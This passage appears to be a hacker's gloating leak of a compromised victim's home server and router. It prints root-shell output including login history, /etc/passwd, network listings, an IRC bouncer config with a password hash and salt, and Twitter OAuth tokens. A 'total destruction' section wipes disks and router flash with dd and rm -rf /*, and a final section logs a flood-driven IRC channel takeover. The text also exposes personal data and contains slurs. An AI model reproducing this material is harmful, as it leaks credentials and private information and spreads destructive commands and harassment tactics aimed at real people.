(00:00) ilken pts/0 192.168.0.169 Sat Oct 28 23:54 - 09:37 (09:43) ilken pts/2 0.0.0.0 Sun Oct 22 05:05 - 05:05 (00:00) ilken pts/2 0.0.0.0 Sun Oct 22 04:58 - 04:58 (00:00) ilken pts/2 0.0.0.0 Sun Oct 22 04:55 - 04:55 (00:00) ilken pts/0 fe80::4248:4dc3:a339:1a73 Sun Oct 22 04:50 - 05:07 (00:17) ilken pts/3 0.0.0.0 Tue Oct 17 14:02 - 15:17 (01:14) ilken pts/3 0.0.0.0 Tue Oct 17 14:00 - 14:02 (00:01) ilken pts/3 0.0.0.0 Tue Oct 17 14:00 - 14:00 (00:00) ilken pts/0 fe80::4248:4dc3:a339:1a73 Tue Oct 17 13:58 - 15:19 (01:20) ilken pts/3 0.0.0.0 Tue Oct 17 13:52 - 13:52 (00:00) ilken pts/3 0.0.0.0 Tue Oct 17 13:51 - 13:51 (00:00) ilken pts/3 0.0.0.0 Tue Oct 17 12:33 - 12:33 (00:00) ilken pts/3 0.0.0.0 Tue Oct 17 12:33 - 12:33 (00:00) ilken pts/2 99.195.230.68 Tue Oct 17 11:47 - 15:19 (03:31) ilken pts/3 99.195.230.68 Tue Oct 17 11:46 - 11:47 (00:00) ilken pts/0 192.168.0.169 Tue Oct 17 11:42 - 13:58 (02:15) ilken pts/1 0.0.0.0 Tue Oct 17 11:23 - 11:30 (00:06) ilken pts/2 0.0.0.0 Tue Oct 17 11:23 - 11:23 (00:00) ilken pts/1 0.0.0.0 Tue Oct 17 11:22 - 11:22 (00:00) ilken pts/1 0.0.0.0 Tue Oct 17 11:17 - 11:22 (00:04) ilken pts/1 0.0.0.0 Tue Oct 17 11:17 - 11:17 (00:00) ilken pts/0 192.168.0.169 Tue Oct 17 11:17 - 11:42 (00:24) reboot system boot 0.0.0.0 Tue Oct 17 11:16 still running ilken pts/1 0.0.0.0 Tue Oct 17 11:12 - 11:13 (00:01) ilken pts/1 0.0.0.0 Tue Oct 17 11:06 - 11:07 (00:00) ilken pts/0 192.168.0.169 Tue Oct 17 11:06 - 11:15 (00:09) reboot system boot 0.0.0.0 Tue Oct 17 11:05 - 11:15 (00:10) ilken pts/1 0.0.0.0 Tue Oct 17 10:54 - 11:00 (00:05) ilken pts/1 0.0.0.0 Tue Oct 17 10:35 - 10:54 (00:18) ilken pts/0 fe80::4248:4dc3:a339:1a73 Tue Oct 17 10:35 - 11:04 (00:28) ilken pts/1 99.195.230.68 Sat Oct 14 21:04 - 03:10 (06:06) ilken pts/0 99.195.230.68 Sat Oct 14 21:00 - 03:35 (06:34) ilken pts/0 192.168.0.169 Wed Oct 11 21:43 - 01:15 (03:31) ilken pts/1 0.0.0.0 Wed Oct 11 21:41 - 21:41 (00:00) ilken pts/1 0.0.0.0 Wed Oct 11 21:36 - 21:41 (00:05) ilken pts/3 192.168.0.169 Wed Oct 11 21:36 - 23:52 (02:15) ilken pts/1 0.0.0.0 Wed Oct 11 21:35 - 21:35 (00:00) ilken pts/0 192.168.0.169 Wed Oct 11 21:31 - 21:43 (00:11) reboot system boot 0.0.0.0 Wed Oct 11 21:30 - 11:04 (5+13:33) ilken pts/0 192.168.0.169 Wed Oct 11 21:28 - 21:30 (00:01) reboot system boot 0.0.0.0 Wed Oct 11 21:27 - 21:30 (00:02) ilken pts/0 192.168.0.169 Wed Oct 11 21:17 - crash (00:09) root@blackbox:/home/ilken# cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false messagebus:x:105:109::/var/run/dbus:/bin/false _apt:x:106:65534::/nonexistent:/bin/false mysql:x:107:110:MySQL Server,,,:/nonexistent:/bin/false lxd:x:108:65534::/var/lib/lxd/:/bin/false uuidd:x:109:114::/run/uuidd:/bin/false postgres:x:110:115:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash postfix:x:111:116::/var/spool/postfix:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false dovecot:x:113:118:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false dovenull:x:114:119:Dovecot login user,,,:/nonexistent:/bin/false bind:x:115:121::/var/cache/bind:/bin/false sshd:x:116:65534::/run/sshd:/usr/sbin/nologin pollinate:x:117:1::/var/cache/pollinate:/bin/false ilken:x:1000:1000:ilken,,,:/home/ilken:/bin/bash rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false usbmux:x:119:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false avahi:x:120:128:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false lightdm:x:121:129:Light Display Manager:/var/lib/lightdm:/bin/false pulse:x:122:131:PulseAudio daemon,,,:/var/run/pulse:/bin/false geoclue:x:123:133::/var/lib/geoclue:/bin/false ftp:x:124:134:ftp daemon,,,:/srv/ftp:/bin/false root@blackbox:/home/ilken# netstat -plant Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 989/mysqld tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 1506/smbd tcp 0 0 0.0.0.0:5355 0.0.0.0:* LISTEN 902/systemd-resolve tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN 972/dovecot tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN 972/dovecot tcp 0 0 192.168.0.87:53 0.0.0.0:* LISTEN 897/named tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 897/named tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1080/sshd tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN 1048/postgres tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 1463/master tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 897/named tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 1506/smbd tcp 0 0 192.168.0.87:57852 128.39.65.230:6697 ESTABLISHED 5891/python tcp6 0 0 :::9001 :::* LISTEN 1897/znc tcp6 0 0 :::5355 :::* LISTEN 902/systemd-resolve tcp6 0 0 :::139 :::* LISTEN 1506/smbd tcp6 0 0 :::110 :::* LISTEN 972/dovecot tcp6 0 0 :::143 :::* LISTEN 972/dovecot tcp6 0 0 :::80 :::* LISTEN 1330/apache2 tcp6 0 0 :::53 :::* LISTEN 897/named tcp6 0 0 :::21 :::* LISTEN 903/vsftpd tcp6 0 0 :::22 :::* LISTEN 1080/sshd tcp6 0 0 ::1:5432 :::* LISTEN 1048/postgres tcp6 0 0 ::1:25 :::* LISTEN 1463/master tcp6 0 0 ::1:953 :::* LISTEN 897/named tcp6 0 0 :::445 :::* LISTEN 1506/smbd tcp6 0 0 2602:63:c3e6:4400:38239 2001:840:0:1000:1::6667 ESTABLISHED 1897/znc tcp6 0 0 2602:63:c3e6:4400:59961 2001:840:0:1000:1::6667 ESTABLISHED 1897/znc tcp6 0 0 2602:63:c3e6:4400:38558 2001:16d8:aaaa:2:::6697 ESTABLISHED 1916/irssi root@blackbox:/home/ilken/.znc# cat configs/znc.conf // WARNING // Do NOT edit this file while ZNC is running! // Use webadmin or *controlpanel instead. // Altering this file by hand will forfeit all support. // But if you feel risky, you might want to read help on /znc saveconfig and /znc rehash. // Also check http://en.znc.in/wiki/Configuration AnonIPLimit = 10 ConnectDelay = 5 HideVersion = false LoadModule = webadmin MaxBufferSize = 500 ProtectWebSessions = true SSLCertFile = /home/ilken/.znc/znc.pem ServerThrottle = 30 Version = 1.6.5 AllowIRC = true AllowWeb = true IPv4 = true IPv6 = true Port = 9001 SSL = false URIPrefix = / Admin = true Allow = * AltNick = `MTW` AppendTimestamp = false AutoClearChanBuffer = true AutoClearQueryBuffer = true BindHost = 2602:63:c3e6:4400:211:2fff:fe71:a187 Buffer = 50 DenyLoadMod = false DenySetBindHost = false Ident = lol JoinTries = 10 LoadModule = chansaver LoadModule = controlpanel MaxJoins = 0 MaxNetworks = 1 MaxQueryBuffers = 50 MultiClients = true Nick = MTW` PrependTimestamp = true QuitMsg = %znc% RealName = You fail at failing lol StatusPrefix = * TimestampFormat = [%H:%M:%S] AltNick = MTW- FloodBurst = 4 FloodRate = 0.70 IRCConnectEnabled = true JoinDelay = 0 LoadModule = simple_away LoadModule = autocycle LoadModule = keepnick LoadModule = kickrejoin Server = irc.paraphysics.net 6667 Server = irc.underworld.no 6667 Server = irc.homelien.no 6667 Disabled = true Disabled = true Key = x Key = x Disabled = true Key = x Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Key = x Disabled = true Key = x Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Key = x Disabled = true Key = x Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Key = x Disabled = true Key = 1488 Key = x Disabled = true Key = x AltNick = daelik Encoding = ^UTF-8 FloodBurst = 4 FloodRate = 1.00 IRCConnectEnabled = true Ident = delta JoinDelay = 0 LoadModule = keepnick LoadModule = kickrejoin Nick = munki RealName = DDOS Squad Delta Server = irc.homelien.no 6667 Server = irc.underworld.no 6667 Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true AltNick = slimer` Encoding = ^UTF-8 FloodBurst = 4 FloodRate = 1.00 IRCConnectEnabled = true Ident = homo JoinDelay = 0 LoadModule = autocycle LoadModule = keepnick LoadModule = kickrejoin Nick = slimer RealName = I'm fucking stoopid Server = efnet.portlane.se 6667 Server = irc.homelien.no 6667 Server = irc.efnet.org 6667 Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Disabled = true Hash = 817e6ae8edb39681e324777381c0d83f9fa3f3299731bab56ecd351571d910eb Method = SHA256 Salt = GXU_UUR2!e-4CnB.3-Ag root@blackbox:/home/ilken# cat .rainbow_oauth <- twitter oauth tokens 1015633092-Bzi2MbRCLMJJdkw1pRTqnVv7FmZAD7NdZDeoImG MrK7WvLJ9etdVGKvLuvqkgGgTfEPiPnZJqwoGQCwXguyL root@blackbox:/home/ilken/.znc# ifconfig -a enp0s18: flags=4163 mtu 1500 inet 192.168.0.87 netmask 255.255.255.0 broadcast 192.168.0.255 inet6 fd00::211:2fff:fe71:a187 prefixlen 64 scopeid 0x0 inet6 2602:63:c3e6:4400:211:2fff:fe71:a187 prefixlen 64 scopeid 0x0 inet6 fe80::211:2fff:fe71:a187 prefixlen 64 scopeid 0x20 ether 00:11:2f:71:a1:87 txqueuelen 1000 (Ethernet) RX packets 56786343 bytes 5061311798 (5.0 GB) RX errors 0 dropped 1803 overruns 0 frame 0 TX packets 40192010 bytes 3341899193 (3.3 GB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73 mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10 loop txqueuelen 1000 (Local Loopback) RX packets 166326 bytes 230800456 (230.8 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 166326 bytes 230800456 (230.8 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 root@blackbox:/home/ilken# du -hs 395M (23.06.2016) rq 56K ascciii2 56K ascii2 4.0K completer.hist 84M Desktop 68M Documents 5.7M Downloads 4.0K interfaces 129M Limnoria 1.5G MILF Creampies 3 (2017) WEB-DL 540p MP4-KLEENEX <- lol 540p? 2.2M pass.txt 4.0K Public 98M rainbowstream 36M venv XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Section 6: total destruction XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ( first the home server ) root@blackbox:~# dd if=/dev/zero of=/dev/sda1 & [1] 31004 root@blackbox:~# Connection to 2602:63:c3e6:4400:211:2fff:fe71:a187 closed by remote host. ( next the router ) # mount rootfs on / type rootfs (rw) /dev/root on / type yaffs (ro) /proc/bus/usb on /proc/bus/usb type usbfs (rw) tmpfs on /etc type tmpfs (rw) none on /tmp type tmpfs (rw) tmpfs on /var type tmpfs (rw) tmpfs on /e-data type tmpfs (rw) tmpfs on /i-data type tmpfs (rw) mdev on /dev/mdev type tmpfs (rw) /dev/loop0 on /mnt/NAND type squashfs (ro) /dev/loop0 on /usr type squashfs (ro) /dev/loop0 on /root type squashfs (ro) /dev/loop0 on /home type squashfs (ro) /dev/mtdblock4 on /mnt/Config type yaffs2 (rw) /dev/mtdblock3 on /mnt/firmware type yaffs2 (rw) /dev/mtdblock2 on /mnt/Data type yaffs (rw) # for i in 1 2 3 4; do dd if=/dev/zero of=/dev/mtdblock${i} & done dd if=/dev/zero of=/dev/mtdblock1 dd if=/dev/zero of=/dev/mtdblock2 dd if=/dev/zero of=/dev/mtdblock3 dd if=/dev/zero of=/dev/mtdblock4 dd: writing '/dev/mtdblock3': No space left on device 91649+0 records in 91648+0 records out Connection to 99.195.230.68 closed by remote host. $ ( meanwhile on IRC ... RIP lulz ) 19:23 -!- darkness [~sinister@2a03:b0c0:0:1010::b7d:e001] has joined #prions 19:35 -!- donkey [~ipv6@2602:63:c3e6:4400:4c66:3f1b:3f5e:34ec] has quit [Ping timeout: 245 seconds] 19:35 -!- munki| [~delta@2602:63:c3e6:4400:211:2fff:fe71:a187] has quit [Ping timeout: 260 seconds] 19:35 -!- ilken\ [~ipv6@2602:63:c3e6:4400:4c66:3f1b:3f5e:34ec] has quit [Ping timeout: 255 seconds] 19:36 -!- MTW^ [~satanic@2607:fcd0:100:1928:0:4:6131:6163] has quit [Remote host closed the connection] 19:37 -!- ilken\ [~ipv6@2602:63:c3e6:4400:4c66:3f1b:3f5e:34ec] has joined #prions 19:37 -!- netstat [~network@2602:63:c3e6:4400:4c66:3f1b:3f5e:34ec] has quit [Read error: Connection reset by peer] 19:38 -!- munki| [~delta@2602:63:c3e6:4400:211:2fff:fe71:a187] has joined #prions 19:39 -!- netstat [~network@2602:63:c3e6:4400:4c66:3f1b:3f5e:34ec] has joined #prions 19:48 -!- A-1 [~ALPHA@ilken-1-pt.tunnel.tserv12.mia1.ipv6.he.net] has quit [Ping timeout: 255 seconds] 19:49 -!- netstat [~network@2602:63:c3e6:4400:4c66:3f1b:3f5e:34ec] has quit [Ping timeout: 260 seconds] 19:50 -!- ilken\ [~ipv6@2602:63:c3e6:4400:4c66:3f1b:3f5e:34ec] has quit [Ping timeout: 255 seconds] 19:52 -!- munki| [~delta@2602:63:c3e6:4400:211:2fff:fe71:a187] has quit [Ping timeout: 260 seconds] root@whitepower:~# dd if=/dev/zero of=/dev/simfs & [1] 31004 root@whitepower:~# rm -rf /* XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Section 7: bonus IRC takeovers XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 00:15 -!- opcon_ [opcon@shell.xshellz.com] has joined #krustykrab 00:15 -!- Topic for #krustykrab: A client from [73.81.121.77] attempted to login as you, but was rejected [Invalid Password]. 00:15 -!- Topic set by wowaname [wowaname@eat.at.the.krustykrab.restaurant] [Tue Oct 31 00:08:19 2017] 00:15 [Users #krustykrab] 00:15 [@alien ] [@merchant ] [@Plankton ] [+A1 ] [+emu ] [+oper ] 00:15 [@bballbird] [@mercy ] [@Sandy ] [+AP0LL0420] [+emu- ] [+pequ ] 00:15 [@brr ] [@moneytree] [@Squidward] [+APOLLO420] [+F ] [+RawSushi] 00:15 [@Ferus ] [@naf ] [@unpriv ] [+APOLLO42O] [+FILENAME] [+temper ] 00:15 [@finch ] [@ovh ] [@voidsta ] [+dboard2 ] [+lacht ] [+Trumpist] 00:15 [@GNAA ] [@Patrick ] [@wowaname ] [+DigDug ] [+neur0 ] [ opcon_ ] 00:15 [@incog ] [@Pearl ] [@www ] [+durp ] [+npk ] 00:15 -!- Irssi: #krustykrab: Total of 41 nicks [21 ops, 0 halfops, 19 voices, 1 normal] 00:15 -!- Channel #krustykrab created Sun Apr 30 06:31:17 2017 00:15 <@ovh> opcon_: 00:15 -!- Irssi: Join to #krustykrab was synced in 1 secs 00:15 < opcon_> hi 00:15 -!- #krustykrab Cannot send to channel 00:15 < opcon_> ilken here 00:15 -!- #krustykrab Cannot send to channel 00:15 -!- mode/#krustykrab [+o-b opcon_ 4d1!LW>[@TDv2myGWZh4GaWZyNFrtlg==] by Plankton 00:15 <@opcon_> hi 00:15 -!- mode/#krustykrab [+v opcon_] by Plankton 00:15 <@opcon_> ilken here 00:15 -!- Netsplit se.hub <-> irc.efnet.nl quits: +durp 00:15 <@merchant> ☩ h ... AMEN! 00:17 -!- 1 - #krustykrab: ban *!*@fuckin.business [by Pearl!irc@fdsdfasgafadcdagasgdagsascfs.afsadgsdcgdcfgefcasfcascfsadf.com, 10091 secs ago] 00:17 -!- 2 - #krustykrab: ban *!*@fuck.energy [by Pearl!irc@fdsdfasgafadcdagasgdagsascfs.afsadgsdcgdcfgefcasfcascfsadf.com, 10091 secs ago] 00:17 -!- 3 - #krustykrab: ban *!c@* [by Pearl!irc@fdsdfasgafadcdagasgdagsascfs.afsadgsdcgdcfgefcasfcascfsadf.com, 10091 secs ago] 00:17 -!- 4 - #krustykrab: ban *!~c@* [by Pearl!irc@fdsdfasgafadcdagasgdagsascfs.afsadgsdcgdcfgefcasfcascfsadf.com, 10091 secs ago] 00:17 -!- 5 - #krustykrab: ban *!*gk*wm*su*@* [by Patrick!irc@2607:f7a0:a:139:caca::, 134811 secs ago] 00:17 -!- 6 - #krustykrab: ban *gk*w*su*!*@* [by Larry!~unpriv@185.82.202.59, 566505 secs ago] 00:17 -!- #krustykrab End of Channel Ban List 00:18 -!- soundmon [~HaCuTata@2604:180:2:12cc::deed] has joined #krustykrab 00:18 -!- ravn [~khoogy16@2604:180:2:12cc::b00b] has joined #krustykrab 00:18 -!- nibble [~GGG@2604:180:2:12cc::deed] has joined #krustykrab 00:18 -!- Me [~tonerz@2604:180:2:12cc:192:1928:5691:1525] has joined #krustykrab 00:18 -!- szkrab [~Motard-@2604:180:2:12cc:3:6:2:7] has joined #krustykrab 00:18 -!- bravehea [~naty@2604:180:2:12cc:1:2:3:0] has joined #krustykrab 00:18 -!- minigon [~direola@2604:180:2:12cc:ff:ff:ff:ff] has joined #krustykrab 00:18 -!- jessica- [~KeeMeAwa@2604:180:2:12cc:ff:ff:ff:ff] has joined #krustykrab 00:18 -!- zmijc [~Puturosu@2604:180:2:12cc:cccc:cccc:cccc:cccc] has joined #krustykrab 00:18 -!- rossocor [~lorraine@2604:180:2:12cc:aaaa:aaaa:aaaa:aaaa] has joined #krustykrab 00:18 -!- [b]ulga [~gillemie@2604:180:2:12cc:dddd:dddd:dddd:dddd] has joined #krustykrab 00:18 -!- band [~ana-38@2604:180:2:12cc:bbbb:bbbb:bbbb:bbbb] has joined #krustykrab 00:18 -!- aman [~unimatri@2604:180:2:12cc:cccc:cccc:cccc:cccc] has joined #krustykrab 00:18 -!- philem [~rep^@2604:180:2:12cc:9999:9999:9999:9999] has joined #krustykrab 00:18 -!- ilmagodi [~nico@2604:180:2:12cc:7777:7777:7777:7777] has joined #krustykrab 00:18 -!- NightSo [~tastp@2604:180:2:12cc:3333:3333:3333:3333] has joined #krustykrab 00:18 -!- prestosp [~cristian@2604:180:2:12cc::f1b:f0b] has joined #krustykrab 00:18 -!- lover`gi [~sjaaaaaa@2604:180:2:12cc:ef:ef:ef:ef] has joined #krustykrab 00:18 -!- certifie [~jjj@2604:180:2:12cc:ef:ef:ef:ef] has joined #krustykrab 00:18 -!- alg [~ixi@2604:180:2:12cc:fade:bacc:babe:f00d] has joined #krustykrab 00:18 -!- guest117 [~pretoria@2604:180:2:12cc::151:b00f] has joined #krustykrab 00:18 -!- mode/#krustykrab [+i] by Sandy 00:18 <@ovh> soundmon: welcome to the krusty krab 00:18 <@ovh> ravn: welcome to the krusty krab 00:18 <@ovh> nibble: <@techman> this is like 10000 lines of crap ascii 00:18 -!- mode/#krustykrab [+o soundmon] by opcon_ 00:18 <@ovh> me: 00:18 -!- mode/#krustykrab [+oooo ravn nibble Me szkrab] by soundmon 00:18 -!- mode/#krustykrab [+oooo bravehea minigon jessica- [b]ulga] by ravn 00:18 -!- mode/#krustykrab [+oooo zmijc aman band rossocor] by szkrab 00:18 -!- mode/#krustykrab [-o opcon_] by soundmon 00:18 -!- mode/#krustykrab [+oooo philem ilmagodi NightSo lover`gi] by Me 00:18 -!- mode/#krustykrab [+oooo certifie prestosp alg guest117] by nibble 00:18 -!- mode/#krustykrab [-oooo soundmon ravn Me szkrab] by Patrick 00:18 -!- soundmon was kicked from #krustykrab by Squidward [Fuck off] 00:18 -!- mode/#krustykrab [-o soundmon] by Sandy 00:18 -!- mode/#krustykrab [-oo nibble szkrab] by Squidward 00:18 -!- mode/#krustykrab [-ooo ravn nibble Me] by Pearl 00:18 -!- mode/#krustykrab [-o szkrab] by Pearl 00:18 -!- mode/#krustykrab [-o Patrick] by certifie 00:18 -!- soundmon [~HaCuTata@2604:180:2:12cc::deed] has joined #krustykrab 00:18 -!- mode/#krustykrab [-o Squidward] by jessica- 00:18 -!- mode/#krustykrab [+o szkrab] by certifie 00:18 -!- mode/#krustykrab [-o Sandy] by certifie 00:18 -!- mode/#krustykrab [+o soundmon] by certifie 00:18 -!- mode/#krustykrab [-o Squidward] by certifie 00:18 -!- mode/#krustykrab [+o nibble] by jessica- 00:18 -!- mode/#krustykrab [-o Squidward] by jessica- 00:18 -!- mode/#krustykrab [+o szkrab] by jessica- 00:18 -!- mode/#krustykrab [-o Pearl] by certifie 00:18 -!- mode/#krustykrab [+o ravn] by certifie 00:18 -!- mode/#krustykrab [+o soundmon] by prestosp 00:18 <@ovh> szkrab: 00:18 -!- mode/#krustykrab [+ooo ravn nibble Me] by szkrab 00:18 -!- mode/#krustykrab [-o soundmon] by Plankton 00:18 -!- mode/#krustykrab [-o Plankton] by Me 00:18 <@ovh> bravehea: install gentoo 00:18 -!- mode/#krustykrab [+o soundmon] by lover`gi 00:18 -!- mode/#krustykrab [-o Pearl] by certifie 00:18 <@ovh> minigon: welcome to the krusty krab 00:18 <@ovh> jessica-: h 00:18 -!- mode/#krustykrab [+o nibble] by certifie 00:18 -!- mode/#krustykrab [-o Pearl] by certifie 00:18 <@ovh> zmijc: 00:18 -!- ravn [~khoogy16@2604:180:2:12cc::b00b] has quit [Excess Flood] 00:18 -!- stin [~boggo@2604:180:2:12cc::c0de] has joined #krustykrab 00:18 -!- mode/#krustykrab [+o Me] by certifie 00:18 -!- mode/#krustykrab [-o Pearl] by certifie 00:18 -!- mode/#krustykrab [+o szkrab] by certifie 00:18 <@ovh> rossocor: install gentoo 00:18 <@ovh> [b]ulga: benis 00:18 <@ovh> band: 00:18 <@ovh> aman: welcome to the krusty krab 00:18 <@ovh> philem: install gentoo 00:18 <@ovh> ilmagodi: 00:18 <@ovh> nightso: h 00:18 <@ovh> prestosp: install gentoo 00:18 -!- mode/#krustykrab [+o stin] by guest117, soundmon 00:18 <@ovh> lover`gi: install gentoo 00:18 -!- soundmon [~HaCuTata@2604:180:2:12cc::deed] has quit [Excess Flood] 00:18 <@ovh> certifie: install gentoo 00:18 <@ovh> alg: benis 00:18 <@ovh> guest117: welcome to the krusty krab 00:18 -!- mode/#krustykrab [-i] by ovh 00:18 -!- MTW- [~MTW@charlton.mirccloud.com] has joined #krustykrab 00:18 <@ovh> soundmon: benis 00:18 <@ovh> stin: benis 00:18 <@ovh> mtw-: <@techman> this is like 10000 lines of crap ascii 00:19 -!- nibble [~GGG@2604:180:2:12cc::deed] has quit [Excess Flood] 00:19 -!- phreakaz [~highline@2604:180:2:12cc:0:f33d:fe3d:feed] has joined #krustykrab 00:19 -!- mode/#krustykrab [+o phreakaz] by stin 00:19 <@ovh> phreakaz: h 00:19 -!- #krustykrab You're not channel operator 00:19 -!- Me [~tonerz@2604:180:2:12cc:192:1928:5691:1525] has quit [Excess Flood] 00:19 -!- isild [~mrorgani@2604:180:2:12cc::d] has joined #krustykrab 00:19 -!- mode/#krustykrab [+o isild] by stin 00:19 <@ovh> isild: benis 00:19 -!- szkrab [~Motard-@2604:180:2:12cc:3:6:2:7] has quit [Excess Flood] 00:19 -!- gianpao [~Trance@2604:180:2:12cc::c] has joined #krustykrab 00:19 -!- mode/#krustykrab [+o gianpao] by stin 00:19 <@ovh> gianpao: install gentoo 00:19 -!- bravehea [~naty@2604:180:2:12cc:1:2:3:0] has quit [Excess Flood] 00:19 -!- Demir32A [~marky@2604:180:2:12cc::c0de] has joined #krustykrab 00:19 -!- mode/#krustykrab [+o Demir32A] by certifie 00:19 <@ovh> demir32a: <@techman> this is like 10000 lines of crap ascii 00:19 -!- minigon [~direola@2604:180:2:12cc:ff:ff:ff:ff] has quit [Excess Flood] 00:19 -!- karolc [~Scorpyo@2604:180:2:12cc:9:2:5:2] has joined #krustykrab 00:19 -!- mode/#krustykrab [+o karolc] by certifie 00:19 <@ovh> karolc: benis 00:19 -!- mode/#krustykrab [+o Sandy] by wowaname 00:19 -!- mode/#krustykrab [-o wowaname] by stin 00:19 -!- mode/#krustykrab [-o Sandy] by stin 00:19 -!- jessica- [~KeeMeAwa@2604:180:2:12cc:ff:ff:ff:ff] has quit [Excess Flood] 00:19 -!- qoreqy [~kyosuu@2604:180:2:12cc:babc:abef:bafe:fea2] has joined #krustykrab 00:19 -!- mode/#krustykrab [-o wowaname] by karolc 00:19 -!- mode/#krustykrab [-o Sandy] by karolc 00:19 <@ovh> qoreqy: <@techman> this is like 10000 lines of crap ascii 00:19 -!- mode/#krustykrab [+o qoreqy] by certifie 00:19 -!- [b]ulga [~gillemie@2604:180:2:12cc:dddd:dddd:dddd:dddd] has quit [Excess Flood] 00:19 -!- pietr [~sharkfin@2604:180:2:12cc::666] has joined #krustykrab 00:19 -!- mode/#krustykrab [+o pietr] by certifie 00:19 <@ovh> pietr: 00:19 -!- mode/#krustykrab [-l] by zmijc 00:19 -!- knopi [~idjut@2604:180:2:12cc::c0de] has joined #krustykrab 00:19 -!- qam [~tri0n3@2604:180:2:12cc:babc:abef:bafe:fea2] has joined #krustykrab 00:19 -!- finb [~BlakCode@2604:180:2:12cc:babc:abef:bafe:fea2] has joined #krustykrab 00:19 -!- garko1 [~qgocxj@2604:180:2:12cc:0:f33d:fe3d:feed] has joined #krustykrab 00:19 -!- va [~bugboy@2604:180:2:12cc::fee] has joined #krustykrab 00:19 -!- blue-ang [~nameeate@2604:180:2:12cc::53c4] has joined #krustykrab 00:19 -!- cicikizl [~Wilditte@2604:180:2:12cc::e] has joined #krustykrab 00:19 -!- su [~mocha21@2604:180:2:12cc::e] has joined #krustykrab 00:19 -!- marl [~red_s@2604:180:2:12cc::1791] has joined #krustykrab 00:19 -!- bigsh [~biser56@2604:180:2:12cc::1791] has joined #krustykrab 00:19 -!- pitt_bu [~wetzz@2604:180:2:12cc::53c4] has joined #krustykrab 00:19 -!- paler [~cristian@2604:180:2:12cc:0:fed:f00d:0] has joined #krustykrab 00:19 -!- renew [~madx971@2604:180:2:12cc:1048:1927:1075:2917] has joined #krustykrab 00:19 -!- f4b1o`[n [~bunut@2604:180:2:12cc:1048:1927:1075:2917] has joined #krustykrab 00:19 -!- hydroce [~anaxor@2604:180:2:12cc:0:fed:f00d:0] has joined #krustykrab 00:19 -!- Me-L-i [~char_asn@2604:180:2:12cc:5161:132:5478:9820] has joined #krustykrab 00:19 -!- palmi [~mastag19@2604:180:2:12cc:5161:132:5478:9820] has joined #krustykrab 00:19 -!- fffff 